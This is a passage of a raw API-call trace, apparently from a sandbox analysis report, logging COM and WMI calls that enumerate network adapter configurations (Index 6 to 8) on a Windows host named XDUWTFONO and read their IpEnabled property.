Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x7178e0) returned 0x0 [0197.608] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7178e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.608] WbemDefPath:IUnknown:Release (This=0x7178e0) returned 0x3 [0197.608] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.608] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.608] WbemDefPath:IUnknown:Release (This=0x521f6a8) returned 0x2 [0197.608] WbemDefPath:IUnknown:Release (This=0x521f6a8) returned 0x1 [0197.608] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.608] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.608] WbemDefPath:IUnknown:QueryInterface (in: This=0x521f6a8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521f6a8) returned 0x0 [0197.608] WbemDefPath:IUnknown:AddRef (This=0x521f6a8) returned 0x3 [0197.608] WbemDefPath:IUnknown:Release (This=0x521f6a8) returned 0x2 [0197.608] WbemDefPath:IWbemPath:SetText (This=0x521f6a8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=6") returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.608] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.609] IWbemClassObject:Get (in: This=0x521f2b8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2579ee8*=0, plFlavor=0x2579eec*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2579ee8*=11, plFlavor=0x2579eec*=0) returned 0x0 [0197.609] IWbemClassObject:Get (in: This=0x521f2b8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2579ee8*=11, plFlavor=0x2579eec*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2579ee8*=11, plFlavor=0x2579eec*=0) returned 0x0 [0197.609] CoTaskMemAlloc (cb=0x4) returned 0x717920 [0197.609] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x717920, puReturned=0x2576450 | out: apObjects=0x717920*=0x521fba8, puReturned=0x2576450*=0x1) returned 0x0 [0197.609] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x521fba8) returned 0x0 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.610] IUnknown:AddRef (This=0x521fba8) returned 0x3 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x521fbac) returned 0x0 [0197.610] IMarshal:GetUnmarshalClass (in: This=0x521fbac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.610] IUnknown:Release (This=0x521fbac) returned 0x3 [0197.610] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.610] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.610] IUnknown:Release (This=0x521fba8) returned 0x2 [0197.610] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.610] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.610] IUnknown:QueryInterface (in: This=0x521fba8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x521fba8) returned 0x0 [0197.610] IUnknown:AddRef (This=0x521fba8) returned 0x4 [0197.610] IUnknown:Release (This=0x521fba8) returned 0x3 [0197.610] IUnknown:Release (This=0x521fba8) returned 0x2 [0197.610] CoTaskMemFree (pv=0x717920) [0197.610] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.610] IUnknown:AddRef (This=0x521fba8) returned 0x3 [0197.610] IWbemClassObject:Get (in: This=0x521fba8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.611] IWbemClassObject:Get (in: This=0x521fba8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=7", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.611] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=7") returned 0x80 [0197.611] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=7") returned 0x80 [0197.611] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.611] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.611] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.611] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.611] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x521cc98) returned 0x0 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521cc98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.612] WbemDefPath:IClassFactory:CreateInstance (in: This=0x521cc98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x521ffa8) returned 0x0 [0197.612] WbemDefPath:IUnknown:Release (This=0x521cc98) returned 0x0 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x521ffa8) returned 0x0 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.612] WbemDefPath:IUnknown:AddRef (This=0x521ffa8) returned 0x3 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d8cc | out: ppvObject=0x26d8cc*=0x0) returned 0x80004002 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d87c | out: ppvObject=0x26d87c*=0x0) returned 0x80004002 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d888 | out: ppvObject=0x26d888*=0x717920) returned 0x0 [0197.612] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x717920, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d890 | out: pCid=0x26d890*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0197.612] WbemDefPath:IUnknown:Release (This=0x717920) returned 0x3 [0197.612] CoGetContextToken (in: pToken=0x26d8e8 | out: pToken=0x26d8e8) returned 0x0 [0197.612] CoGetContextToken (in: pToken=0x26dcf0 | out: pToken=0x26dcf0) returned 0x0 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dd80 | out: ppvObject=0x26dd80*=0x0) returned 0x80004002 [0197.612] WbemDefPath:IUnknown:Release (This=0x521ffa8) returned 0x2 [0197.612] WbemDefPath:IUnknown:Release (This=0x521ffa8) returned 0x1 [0197.612] CoGetContextToken (in: pToken=0x26e678 | out: pToken=0x26e678) returned 0x0 [0197.612] CoGetContextToken (in: pToken=0x26e5d8 | out: pToken=0x26e5d8) returned 0x0 [0197.612] WbemDefPath:IUnknown:QueryInterface (in: This=0x521ffa8, riid=0x26e6a8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26e6a4 | out: ppvObject=0x26e6a4*=0x521ffa8) returned 0x0 [0197.612] WbemDefPath:IUnknown:AddRef (This=0x521ffa8) returned 0x3 [0197.612] WbemDefPath:IUnknown:Release (This=0x521ffa8) returned 0x2 [0197.613] WbemDefPath:IWbemPath:SetText (This=0x521ffa8, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=7") returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e828 | out: puCount=0x26e828*=0x2) returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0x0, pszText=0x0 | out: puBuffLength=0x26e824*=0xf, pszText=0x0) returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e824*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e824*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26e7f4 | out: puCount=0x26e7f4*=0x2) returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0x0, pszText=0x0 | out: puBuffLength=0x26e7f0*=0xf, pszText=0x0) returned 0x0 [0197.613] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26e7f0*=0xf, pszText="00000000000000" | out: puBuffLength=0x26e7f0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.613] IWbemClassObject:Get (in: This=0x521fba8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257a720*=0, plFlavor=0x257a724*=0 | out: pVal=0x26e7f0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257a720*=11, plFlavor=0x257a724*=0) returned 0x0 [0197.613] IWbemClassObject:Get (in: This=0x521fba8, wszName="IpEnabled", lFlags=0, pVal=0x26e7f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257a720*=11, plFlavor=0x257a724*=0 | out: pVal=0x26e7f8*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x257a720*=11, plFlavor=0x257a724*=0) returned 0x0 [0197.613] CoTaskMemAlloc (cb=0x4) returned 0x767ff8 [0197.613] IEnumWbemClassObject:Next (in: This=0x5210bbc, lTimeout=-1, uCount=0x1, apObjects=0x767ff8, puReturned=0x2576450 | out: apObjects=0x767ff8*=0x52200a8, puReturned=0x2576450*=0x1) returned 0x0 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26de60 | out: ppvObject=0x26de60*=0x52200a8) returned 0x0 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26de1c | out: ppvObject=0x26de1c*=0x0) returned 0x80004002 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26dc3c | out: ppvObject=0x26dc3c*=0x0) returned 0x80004002 [0197.614] IUnknown:AddRef (This=0x52200a8) returned 0x3 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26d77c | out: ppvObject=0x26d77c*=0x0) returned 0x80004002 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26d72c | out: ppvObject=0x26d72c*=0x0) returned 0x80004002 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d738 | out: ppvObject=0x26d738*=0x52200ac) returned 0x0 [0197.614] IMarshal:GetUnmarshalClass (in: This=0x52200ac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26d740 | out: pCid=0x26d740*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0197.614] IUnknown:Release (This=0x52200ac) returned 0x3 [0197.614] CoGetContextToken (in: pToken=0x26d798 | out: pToken=0x26d798) returned 0x0 [0197.614] CoGetContextToken (in: pToken=0x26dba0 | out: pToken=0x26dba0) returned 0x0 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dc30 | out: ppvObject=0x26dc30*=0x0) returned 0x80004002 [0197.614] IUnknown:Release (This=0x52200a8) returned 0x2 [0197.614] CoGetContextToken (in: pToken=0x26e170 | out: pToken=0x26e170) returned 0x0 [0197.614] CoGetContextToken (in: pToken=0x26e0d0 | out: pToken=0x26e0d0) returned 0x0 [0197.614] IUnknown:QueryInterface (in: This=0x52200a8, riid=0x26e1a0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26e19c | out: ppvObject=0x26e19c*=0x52200a8) returned 0x0 [0197.614] IUnknown:AddRef (This=0x52200a8) returned 0x4 [0197.615] IUnknown:Release (This=0x52200a8) returned 0x3 [0197.615] IUnknown:Release (This=0x52200a8) returned 0x2 [0197.615] CoTaskMemFree (pv=0x767ff8) [0197.615] CoGetContextToken (in: pToken=0x26e4d8 | out: pToken=0x26e4d8) returned 0x0 [0197.615] IUnknown:AddRef (This=0x52200a8) returned 0x3 [0197.615] IWbemClassObject:Get (in: This=0x52200a8, wszName="__GENUS", lFlags=0, pVal=0x26e7ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e86c*=0, plFlavor=0x26e868*=0 | out: pVal=0x26e7ec*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26e86c*=3, plFlavor=0x26e868*=64) returned 0x0 [0197.615] IWbemClassObject:Get (in: This=0x52200a8, wszName="__PATH", lFlags=0, pVal=0x26e7d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e854*=0, plFlavor=0x26e850*=0 | out: pVal=0x26e7d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=8", varVal2=0x0), pType=0x26e854*=8, plFlavor=0x26e850*=64) returned 0x0 [0197.615] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=8") returned 0x80 [0197.615] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=8") returned 0x80 [0197.615] CoGetObjectContext (in: riid=0x224f510*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e7fc | out: ppv=0x26e7fc*=0x6ded34) returned 0x0 [0197.615] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26e7f4 | out: pAptType=0x26e7f4*=1) returned 0x0 [0197.615] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x224f4f8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26e7f8 | out: ppvObject=0x26e7f8*=0x0) returned 0x80004002 [0197.615] IUnknown:Release (This=0x6ded34) returned 0x1 [0197.616] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e168 | out: ppv=0x26e168*=0x5210940) returned 0x0 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210940, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26e380 | out: ppvObject=0x26e380*=0x0) returned 0x80004002 [0197.616] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210940, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e394 | out: ppvObject=0x26e394*=0x5220240) returned 0x0 [0197.616] WbemDefPath:IUnknown:Release (This=0x5210940) returned 0x0 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26dfb4 | out: ppvObject=0x26dfb4*=0x5220240) returned 0x0 [0197.616] WbemDefPath:IUnknown:QueryInterface (in: This=0x5220240, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26df70 | out: ppvObject=0x26df70*=0x0) returned 0x80004002 [0197.616] 